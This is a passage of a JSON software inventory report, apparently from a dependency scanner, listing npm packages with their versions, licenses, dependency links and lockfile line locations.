"UID": "71d932b99c08d386" }, "Version": "3.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/d3-color@3.1.3" ], "Locations": [ { "StartLine": 2859, "EndLine": 2867 } ], "AnalyzedBy": "npm" }, { "ID": "@types/d3-path@3.1.1", "Name": "@types/d3-path", "Identifier": { "PURL": "pkg:npm/%40types/d3-path@3.1.1", "UID": "f67ba6b0d32c782e" }, "Version": "3.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2868, "EndLine": 2873 } ], "AnalyzedBy": "npm" }, { "ID": "@types/d3-scale@4.0.9", "Name": "@types/d3-scale", "Identifier": { "PURL": "pkg:npm/%40types/d3-scale@4.0.9", "UID": "da7caae6c29f1e15" }, "Version": "4.0.9", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/d3-time@3.0.4" ], "Locations": [ { "StartLine": 2874, "EndLine": 2882 } ], "AnalyzedBy": "npm" }, { "ID": "@types/d3-shape@3.1.8", "Name": "@types/d3-shape", "Identifier": { "PURL": "pkg:npm/%40types/d3-shape@3.1.8", "UID": "1bbcffcc23216c5c" }, "Version": "3.1.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/d3-path@3.1.1" ], "Locations": [ { "StartLine": 2883, "EndLine": 2891 } ], "AnalyzedBy": "npm" }, { "ID": "@types/d3-time@3.0.4", "Name": "@types/d3-time", "Identifier": { "PURL": "pkg:npm/%40types/d3-time@3.0.4", "UID": "ae1e51231fd0e76e" }, "Version": "3.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2892, "EndLine": 2897 } ], "AnalyzedBy": "npm" }, { "ID": "@types/d3-timer@3.0.2", "Name": "@types/d3-timer", "Identifier": { "PURL": "pkg:npm/%40types/d3-timer@3.0.2", "UID": "8d8581be3c6a7ec8" }, "Version": "3.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2898, "EndLine": 2903 } ], "AnalyzedBy": "npm" }, { "ID": "@types/jsonwebtoken@9.0.10", "Name": "@types/jsonwebtoken", "Identifier": { "PURL": "pkg:npm/%40types/jsonwebtoken@9.0.10", "UID": "9660c30f82134e15" }, "Version": "9.0.10", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/ms@2.1.0", "@types/node@20.19.39" ], "Locations": [ { "StartLine": 2944, "EndLine": 2953 } ], "AnalyzedBy": "npm" }, { "ID": "@types/long@4.0.2", "Name": "@types/long", "Identifier": { "PURL": "pkg:npm/%40types/long@4.0.2", "UID": "7eb60ee1c3aa7938" }, "Version": "4.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2954, "EndLine": 2960 } ], "AnalyzedBy": "npm" }, { "ID": "@types/ms@2.1.0", "Name": "@types/ms", "Identifier": { "PURL": "pkg:npm/%40types/ms@2.1.0", "UID": "21a18200af4fcee0" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2985, "EndLine": 2990 } ], "AnalyzedBy": "npm" }, { "ID": "@types/node@22.19.17", "Name": "@types/node", "Identifier": { "PURL": "pkg:npm/%40types/node@22.19.17", "UID": "7e3d4b381aaa8098" }, "Version": "22.19.17", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "undici-types@6.21.0" ], "Locations": [ { "StartLine": 5554, "EndLine": 5562 } ], "AnalyzedBy": "npm" }, { "ID": "@types/request@2.48.13", "Name": "@types/request", "Identifier": { "PURL": "pkg:npm/%40types/request@2.48.13", "UID": "cfca9fbcb751d85c" }, "Version": "2.48.13", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/caseless@0.12.5", "@types/node@20.19.39", "@types/tough-cookie@4.0.5", "form-data@2.5.5" ], "Locations": [ { "StartLine": 3079, "EndLine": 3091 } ], "AnalyzedBy": "npm" }, { "ID": "@types/tough-cookie@4.0.5", "Name": "@types/tough-cookie", "Identifier": { "PURL": "pkg:npm/%40types/tough-cookie@4.0.5", "UID": "63406eba3ca131d" }, "Version": "4.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3191, "EndLine": 3197 } ], "AnalyzedBy": "npm" }, { "ID": "@types/ws@8.18.1", "Name": "@types/ws", "Identifier": { "PURL": "pkg:npm/%40types/ws@8.18.1", "UID": "4552b4cf6387342a" }, "Version": "8.18.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/node@20.19.39" ], "Locations": [ { "StartLine": 3198, "EndLine": 3206 } ], "AnalyzedBy": "npm" }, { "ID": "abbrev@2.0.0", "Name": "abbrev", "Identifier": { "PURL": "pkg:npm/abbrev@2.0.0", "UID": "6ebca42264f8d8c2" }, "Version": "2.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3317, "EndLine": 3325 } ], "AnalyzedBy": "npm" }, { "ID": "abort-controller@3.0.0", "Name": "abort-controller", "Identifier": { "PURL": "pkg:npm/abort-controller@3.0.0", "UID": "858eccdc130cb82" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "event-target-shim@5.0.1" ], "Locations": [ { "StartLine": 3326, "EndLine": 3338 } ], "AnalyzedBy": "npm" }, { "ID": "abs-svg-path@0.1.1", "Name": "abs-svg-path", "Identifier": { "PURL": "pkg:npm/abs-svg-path@0.1.1", "UID": "719c50414777739f" }, "Version": "0.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3339, "EndLine": 3344 } ], "AnalyzedBy": "npm" }, { "ID": "accepts@1.3.8", "Name": "accepts", "Identifier": { "PURL": "pkg:npm/accepts@1.3.8", "UID": "737b7e223834ea75" }, "Version": "1.3.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mime-types@2.1.35", "negotiator@0.6.3" ], "Locations": [ { "StartLine": 3345, "EndLine": 3357 } ], "AnalyzedBy": "npm" }, { "ID": "agent-base@6.0.2", "Name": "agent-base", "Identifier": { "PURL": "pkg:npm/agent-base@6.0.2", "UID": "53e758bccb8bbae6" }, "Version": "6.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "debug@4.4.3" ], "Locations": [ { "StartLine": 6180, "EndLine": 6192 }, { "StartLine": 9597, "EndLine": 9609 }, { "StartLine": 10064, "EndLine": 10075 } ], "AnalyzedBy": "npm" }, { "ID": "agent-base@7.1.4", "Name": "agent-base", "Identifier": { "PURL": "pkg:npm/agent-base@7.1.4", "UID": "58918088e252a98b" }, "Version": "7.1.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3394, "EndLine": 3403 } ], "AnalyzedBy": "npm" }, { "ID": "ansi-regex@5.0.1", "Name": "ansi-regex", "Identifier": { "PURL": "pkg:npm/ansi-regex@5.0.1", "UID": "5fcb6bae138cfbb" }, "Version": "5.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3421, "EndLine": 3429 } ], "AnalyzedBy": "npm" }, { "ID": "ansi-regex@6.2.2", "Name": "ansi-regex", "Identifier": { "PURL": "pkg:npm/ansi-regex@6.2.2", "UID": "57f8cef96bc42a7a" }, "Version": "6.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1438, "EndLine": 1449 } ], "AnalyzedBy": "npm" }, { "ID": "ansi-styles@4.3.0", "Name": "ansi-styles", "Identifier": { "PURL": "pkg:npm/ansi-styles@4.3.0", "UID": "14549cf2fc021d" }, "Version": "4.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-convert@2.0.1" ], "Locations": [ { "StartLine": 3430, "EndLine": 3444 } ], "AnalyzedBy": "npm" }, { "ID": "ansi-styles@6.2.3", "Name": "ansi-styles", "Identifier": { "PURL": "pkg:npm/ansi-styles@6.2.3", "UID": "a7c05a7a9bcda990" }, "Version": "6.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1450, "EndLine": 1461 } ], "AnalyzedBy": "npm" }, { "ID": "any-promise@1.3.0", "Name": "any-promise", "Identifier": { "PURL": "pkg:npm/any-promise@1.3.0", "UID": "3f1a0d5b8b814d1c" }, "Version": "1.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3445, "EndLine": 3450 } ], "AnalyzedBy": "npm" }, { "ID": "anymatch@3.1.3", "Name": "anymatch", "Identifier": { "PURL": "pkg:npm/anymatch@3.1.3", "UID": "10b5b304c2386dbd" }, "Version": "3.1.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "normalize-path@3.0.0", "picomatch@2.3.2" ], "Locations": [ { "StartLine": 3451, "EndLine": 3463 } ], "AnalyzedBy": "npm" }, { "ID": "append-field@1.0.0", "Name": "append-field", "Identifier": { "PURL": "pkg:npm/append-field@1.0.0", "UID": "e506406553a20731" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3464, "EndLine": 3469 } ], "AnalyzedBy": "npm" }, { "ID": "arg@5.0.2", "Name": "arg", "Identifier": { "PURL": "pkg:npm/arg@5.0.2", "UID": "ed1f92f13f84203a" }, "Version": "5.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3470, "EndLine": 3475 } ], "AnalyzedBy": "npm" }, { "ID": "array-flatten@1.1.1", "Name": "array-flatten", "Identifier": { "PURL": "pkg:npm/array-flatten@1.1.1", "UID": "f9e0ab8e78c5b41b" }, "Version": "1.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3483, "EndLine": 3488 } ], "AnalyzedBy": "npm" }, { "ID": "arrify@2.0.1", "Name": "arrify", "Identifier": { "PURL": "pkg:npm/arrify@2.0.1", "UID": "f905947c5703108f" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3489, "EndLine": 3498 } ], "AnalyzedBy": "npm" }, { "ID": "async-retry@1.3.3", "Name": "async-retry", "Identifier": { "PURL": "pkg:npm/async-retry@1.3.3", "UID": "5e47fb0a7260bb90" }, "Version": "1.3.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "retry@0.13.1" ], "Locations": [ { "StartLine": 3516, "EndLine": 3525 } ], "AnalyzedBy": "npm" }, { "ID": "asynckit@0.4.0", "Name": "asynckit", "Identifier": { "PURL": "pkg:npm/asynckit@0.4.0", "UID": "c93c5aaba256e827" }, "Version": "0.4.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3526, "EndLine": 3531 } ], "AnalyzedBy": "npm" }, { "ID": "autoprefixer@10.5.0", "Name": "autoprefixer", "Identifier": { "PURL": "pkg:npm/autoprefixer@10.5.0", "UID": "be06f9b7bfed7c6a" }, "Version": "10.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "browserslist@4.28.2", "caniuse-lite@1.0.30001791", "fraction.js@5.3.4", "picocolors@1.1.1", "postcss-value-parser@4.2.0", "postcss@8.5.12" ], "Locations": [ { "StartLine": 3532, "EndLine": 3567 } ], "AnalyzedBy": "npm" }, { "ID": "axios@1.15.2", "Name": "axios", "Identifier": { "PURL": "pkg:npm/axios@1.15.2", "UID": "912ac8b12f666bfc" }, "Version": "1.15.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "follow-redirects@1.16.0", "form-data@4.0.5", "proxy-from-env@2.1.0" ], "Locations": [ { "StartLine": 3568, "EndLine": 3578 } ], "AnalyzedBy": "npm" }, { "ID": "balanced-match@1.0.2", "Name": "balanced-match", "Identifier": { "PURL": "pkg:npm/balanced-match@1.0.2", "UID": "37c7f4bafd016aa7" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3595, "EndLine": 3600 } ], "AnalyzedBy": "npm" }, { "ID": "base64-js@0.0.8", "Name": "base64-js", "Identifier": { "PURL": "pkg:npm/base64-js@0.0.8", "UID": "daafced1bc0e25fc" }, "Version": "0.0.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6752, "EndLine": 6760 } ], "AnalyzedBy": "npm" }, { "ID": "base64-js@1.5.1", "Name": "base64-js", "Identifier": { "PURL": "pkg:npm/base64-js@1.5.1", "UID": "17cd067319d5ca87" }, "Version": "1.5.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3601, "EndLine": 3620 } ], "AnalyzedBy": "npm" }, { "ID": "base64id@2.0.0", "Name": "base64id", "Identifier": { "PURL": "pkg:npm/base64id@2.0.0", "UID": "3612cd58582ae011" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3621, "EndLine": 3629 } ], "AnalyzedBy": "npm" }, { "ID": "baseline-browser-mapping@2.10.24", "Name": "baseline-browser-mapping", "Identifier": { "PURL": "pkg:npm/baseline-browser-mapping@2.10.24", "UID": "319688dc6d0d6011" }, "Version": "2.10.24", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3630, "EndLine": 3641 } ], "AnalyzedBy": "npm" }, { "ID": "basic-auth@2.0.1", "Name": "basic-auth", "Identifier": { "PURL": "pkg:npm/basic-auth@2.0.1", "UID": "b9d07fdc1c251fe4" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "safe-buffer@5.1.2" ], "Locations": [ { "StartLine": 3642, "EndLine": 3653 } ], "AnalyzedBy": "npm" }, { "ID": "bcryptjs@2.4.3", "Name": "bcryptjs", "Identifier": { "PURL": "pkg:npm/bcryptjs@2.4.3", "UID": "2b1268863687095d" }, "Version": "2.4.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3660, "EndLine": 3665 } ], "AnalyzedBy": "npm" }, { "ID": "bidi-js@1.0.3", "Name": "bidi-js", "Identifier": { "PURL": "pkg:npm/bidi-js@1.0.3", "UID": "64ec0b3ebcce1f79" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "require-from-string@2.0.2" ], "Locations": [ { "StartLine": 3666, "EndLine": 3674 } ], "AnalyzedBy": "npm" }, { "ID": "bignumber.js@9.3.1", "Name": "bignumber.js", "Identifier": { "PURL": "pkg:npm/bignumber.js@9.3.1", "UID": "3d5d6d5506b7e0ea" }, "Version": "9.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3675, "EndLine": 3684 } ], "AnalyzedBy": "npm" }, { "ID": "binary-extensions@2.3.0", "Name": "binary-extensions", "Identifier": { "PURL": "pkg:npm/binary-extensions@2.3.0", "UID": "4c0106a675c1d2c4" }, "Version": "2.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3685, "EndLine": 3696 } ], "AnalyzedBy": "npm" }, { "ID": "body-parser@1.20.5", "Name": "body-parser", "Identifier": { "PURL": "pkg:npm/body-parser@1.20.5", "UID": "3f1264e9543f8862" }, "Version": "1.20.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bytes@3.1.2", "content-type@1.0.5", "debug@2.6.9", "depd@2.0.0", "destroy@1.2.0", "http-errors@2.0.1", "iconv-lite@0.4.24", "on-finished@2.4.1", "qs@6.15.1", "raw-body@2.5.3", "type-is@1.6.18", "unpipe@1.0.0" ], "Locations": [ { "StartLine": 3697, "EndLine": 3720 } ], "AnalyzedBy": "npm" }, { "ID": "brace-expansion@2.1.0", "Name": "brace-expansion", "Identifier": { "PURL": "pkg:npm/brace-expansion@2.1.0", "UID": "3660fe3a33703bb" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "balanced-match@1.0.2" ], "Locations": [ { "StartLine": 4753, "EndLine": 4761 }, { "StartLine": 6523, "EndLine": 6531 } ], "AnalyzedBy": "npm" }, { "ID": "braces@3.0.3", "Name": "braces", "Identifier": { "PURL": "pkg:npm/braces@3.0.3", "UID": "462d5121ded474d7" }, "Version": "3.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "fill-range@7.1.1" ], "Locations": [ { "StartLine": 3762, "EndLine": 3773 } ], "AnalyzedBy": "npm" }, { "ID": "brotli@1.3.3", "Name": "brotli", "Identifier": { "PURL": "pkg:npm/brotli@1.3.3", "UID": "89e467fc10b8d89c" }, "Version": "1.3.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "base64-js@1.5.1" ], "Locations": [ { "StartLine": 3774, "EndLine": 3782 } ], "AnalyzedBy": "npm" }, { "ID": "browserify-zlib@0.2.0", "Name": "browserify-zlib", "Identifier": { "PURL": "pkg:npm/browserify-zlib@0.2.0", "UID": "e5e83886eecb1038" }, "Version": "0.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "pako@1.0.11" ], "Locations": [ { "StartLine": 3783, "EndLine": 3791 } ], "AnalyzedBy": "npm" }, { "ID": "browserslist@4.28.2", "Name": "browserslist", "Identifier": { "PURL": "pkg:npm/browserslist@4.28.2", "UID": "9989820925cb4561" }, "Version": "4.28.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "baseline-browser-mapping@2.10.24", "caniuse-lite@1.0.30001791", "electron-to-chromium@1.5.345", "node-releases@2.0.38", "update-browserslist-db@1.2.3" ], "Locations": [ { "StartLine": 3792, "EndLine": 3824 } ], "AnalyzedBy": "npm" }, { "ID": "buffer-equal-constant-time@1.0.1", "Name": "buffer-equal-constant-time", "Identifier": { "PURL": "pkg:npm/buffer-equal-constant-time@1.0.1", "UID": "296320b77d22f63a" }, "Version": "1.0.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3825, "EndLine": 3830 } ], "AnalyzedBy": "npm" }, { "ID": "buffer-from@1.1.2", "Name": "buffer-from", "Identifier": { "PURL": "pkg:npm/buffer-from@1.1.2", "UID": "4b1f69aae3458b25" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3831, "EndLine": 3836 } ], "AnalyzedBy": "npm" }, { "ID": "busboy@1.6.0", "Name": "busboy", "Identifier": { "PURL": "pkg:npm/busboy@1.6.0", "UID": "48636b97e9eae06a" }, "Version": "1.6.0", "Indirect": true, "Relationship": "indirect", "DependsOn": [ "streamsearch@1.1.0" ], "Locations": [ { "StartLine": 3837, "EndLine": 3847 } ], "AnalyzedBy": "npm" }, { "ID": "bytes@3.1.2", "Name": "bytes", "Identifier": { "PURL": "pkg:npm/bytes@3.1.2", "UID": "f3d5c7a8d1e4f183" }, "Version": "3.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3848, "EndLine": 3856 } ], "AnalyzedBy": "npm" }, { "ID": "call-bind-apply-helpers@1.0.2", "Name": "call-bind-apply-helpers", "Identifier": { "PURL": "pkg:npm/call-bind-apply-helpers@1.0.2", "UID": "6ebd38e62a74b66d" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-errors@1.3.0", "function-bind@1.1.2" ], "Locations": [ { "StartLine": 3867, "EndLine": 3879 } ], "AnalyzedBy": "npm" }, { "ID": "call-bound@1.0.4", "Name": "call-bound", "Identifier": { "PURL": "pkg:npm/call-bound@1.0.4", "UID": "c6be2c8f0227c863" }, "Version": "1.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bind-apply-helpers@1.0.2", "get-intrinsic@1.3.0" ], "Locations": [ { "StartLine": 3880, "EndLine": 3895 } ], "AnalyzedBy": "npm" }, { "ID": "camelcase@5.3.1", "Name": "camelcase", "Identifier": { "PURL": "pkg:npm/camelcase@5.3.1", "UID": "559b7c107bd0c4d2" }, "Version": "5.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3906, "EndLine": 3914 } ], "AnalyzedBy": "npm" }, { "ID": "camelcase-css@2.0.1", "Name": "camelcase-css", "Identifier": { "PURL": "pkg:npm/camelcase-css@2.0.1", "UID": "5e4ccd143ecdfbf1" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3915, "EndLine": 3923 } ], "AnalyzedBy": "npm" }, { "ID": "caniuse-lite@1.0.30001791", "Name": "caniuse-lite", "Identifier": { "PURL": "pkg:npm/caniuse-lite@1.0.30001791", "UID": "b15b1a1fb62f517d" }, "Version": "1.0.30001791", "Licenses": [ "CC-BY-4.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3924, "EndLine": 3943 } ], "AnalyzedBy": "npm" }, { "ID": "chokidar@3.6.0", "Name": "chokidar", "Identifier": { "PURL": "pkg:npm/chokidar@3.6.0", "UID": "4d5e9a887006b4af" }, "Version": "3.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "anymatch@3.1.3", "braces@3.0.3", "fsevents@2.3.3", "glob-parent@5.1.2", "is-binary-path@2.1.0", "is-glob@4.0.3", "normalize-path@3.0.0", "readdirp@3.6.0" ], "Locations": [ { "StartLine": 3993, "EndLine": 4016 } ], "AnalyzedBy": "npm" }, { "ID": "client-only@0.0.1", "Name": "client-only", "Identifier": { "PURL": "pkg:npm/client-only@0.0.1", "UID": "c7336dbbc792d08d" }, "Version": "0.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4029, "EndLine": 4034 } ], "AnalyzedBy": "npm" }, { "ID": "cliui@6.0.0", "Name": "cliui", "Identifier": { "PURL": "pkg:npm/cliui@6.0.0", "UID": "5659e150fc5ef670" }, "Version": "6.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "string-width@4.2.3", "strip-ansi@6.0.1", "wrap-ansi@6.2.0" ], "Locations": [ { "StartLine": 8191, "EndLine": 8201 } ], "AnalyzedBy": "npm" }, { "ID": "cliui@8.0.1", "Name": "cliui", "Identifier": { "PURL": "pkg:npm/cliui@8.0.1", "UID": "662eaf1e64bfbfec" }, "Version": "8.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "string-width@4.2.3", "strip-ansi@6.0.1", "wrap-ansi@7.0.0" ], "Locations": [ { "StartLine": 4035, "EndLine": 4049 } ], "AnalyzedBy": "npm" }, { "ID": "clone@2.1.2", "Name": "clone", "Identifier": { "PURL": "pkg:npm/clone@2.1.2", "UID": "e1020a918c0500a6" }, "Version": "2.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4050, "EndLine": 4058 } ], "AnalyzedBy": "npm" }, { "ID": "clsx@2.1.1", "Name": "clsx", "Identifier": { "PURL": "pkg:npm/clsx@2.1.1", "UID": "50de477be7aabd37" }, "Version": "2.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4059, "EndLine": 4067 } ], "AnalyzedBy": "npm" }, { "ID": "cluster-key-slot@1.1.2", "Name": "cluster-key-slot", "Identifier": { "PURL": "pkg:npm/cluster-key-slot@1.1.2", "UID": "4c70e741a480df20" }, "Version": "1.1.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4068, "EndLine": 4076 } ], "AnalyzedBy": "npm" }, { "ID": "color-convert@2.0.1", "Name": "color-convert", "Identifier": { "PURL": "pkg:npm/color-convert@2.0.1", "UID": "b43288967c904ffd" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-name@1.1.4" ], "Locations": [ { "StartLine": 4077, "EndLine": 4088 } ], "AnalyzedBy": "npm" }, { "ID": "color-name@1.1.4", "Name": "color-name", "Identifier": { "PURL": "pkg:npm/color-name@1.1.4", "UID": "b6c8aaf6425dcbe9" }, "Version": "1.1.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4089, "EndLine": 4094 } ], "AnalyzedBy": "npm" }, { "ID": "color-name@2.1.0", "Name": "color-name", "Identifier": { "PURL": "pkg:npm/color-name@2.1.0", "UID": "bee58c9e25a6ad4" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2264, "EndLine": 2272 } ], "AnalyzedBy": "npm" }, { "ID": "color-string@1.9.1", "Name": "color-string", "Identifier": { "PURL": "pkg:npm/color-string@1.9.1", "UID": "d54f847f2ae918c8" }, "Version": "1.9.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-name@1.1.4", "simple-swizzle@0.2.4" ], "Locations": [ { "StartLine": 4095, "EndLine": 4104 } ], "AnalyzedBy": "npm" }, { "ID": "color-string@2.1.4", "Name": "color-string", "Identifier": { "PURL": "pkg:npm/color-string@2.1.4", "UID": "603f3865c91b523c" }, "Version": "2.1.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-name@2.1.0" ], "Locations": [ { "StartLine": 2273, "EndLine": 2284 } ], "AnalyzedBy": "npm" }, { "ID": "combined-stream@1.0.8", "Name": "combined-stream", "Identifier": { "PURL": "pkg:npm/combined-stream@1.0.8", "UID": "fe1cd1fb7e81fc57" }, "Version": "1.0.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "delayed-stream@1.0.0" ], "Locations": [ { "StartLine": 4105, "EndLine": 4116 } ], "AnalyzedBy": "npm" }, { "ID": "commander@10.0.1", "Name": "commander", "Identifier": { "PURL": "pkg:npm/commander@10.0.1", "UID": "47a2eae64706a871" }, "Version": "10.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4117, "EndLine": 4125 } ], "AnalyzedBy": "npm" }, { "ID": "commander@4.1.1", "Name": "commander", "Identifier": { "PURL": "pkg:npm/commander@4.1.1", "UID": "79b3ef7bed5006a6" }, "Version": "4.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9403, "EndLine": 9411 } ], "AnalyzedBy": "npm" }, { "ID": "concat-stream@1.6.2", "Name": "concat-stream", "Identifier": { "PURL": "pkg:npm/concat-stream@1.6.2", "UID": "6facc0f38d10541d" }, "Version": "1.6.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "buffer-from@1.1.2", "inherits@2.0.4", "readable-stream@2.3.8", "typedarray@0.0.6" ], "Locations": [ { "StartLine": 4143, "EndLine": 4157 } ], "AnalyzedBy": "npm" }, { "ID": "config-chain@1.1.13", "Name": "config-chain", "Identifier": { "PURL": "pkg:npm/config-chain@1.1.13", "UID": "6d23acd866c910fc" }, "Version": "1.1.13", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ini@1.3.8", "proto-list@1.2.4" ], "Locations": [ { "StartLine": 4195, "EndLine": 4204 } ], "AnalyzedBy": "npm" }, { "ID": "content-disposition@0.5.4", "Name": "content-disposition", "Identifier": { "PURL": "pkg:npm/content-disposition@0.5.4", "UID": "1beb7892521d7812" }, "Version": "0.5.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "safe-buffer@5.2.1" ], "Locations": [ { "StartLine": 4205, "EndLine": 4216 } ], "AnalyzedBy": "npm" }, { "ID": "content-type@1.0.5", "Name": "content-type", "Identifier": { "PURL": "pkg:npm/content-type@1.0.5", "UID": "3a35cac88a3f69b9" }, "Version": "1.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4217, "EndLine": 4225 } ], "AnalyzedBy": "npm" }, { "ID": "cookie@0.7.2", "Name": "cookie", "Identifier": { "PURL": "pkg:npm/cookie@0.7.2", "UID": "3a81a7ef9422ca0f" }, "Version": "0.7.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4857, "EndLine": 4865 }, { "StartLine": 5286, "EndLine": 5294 } ], "AnalyzedBy": "npm" }, { "ID": "cookie-signature@1.0.7", "Name": "cookie-signature", "Identifier": { "PURL": "pkg:npm/cookie-signature@1.0.7", "UID": "296f759da591d7e5" }, "Version": "1.0.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": 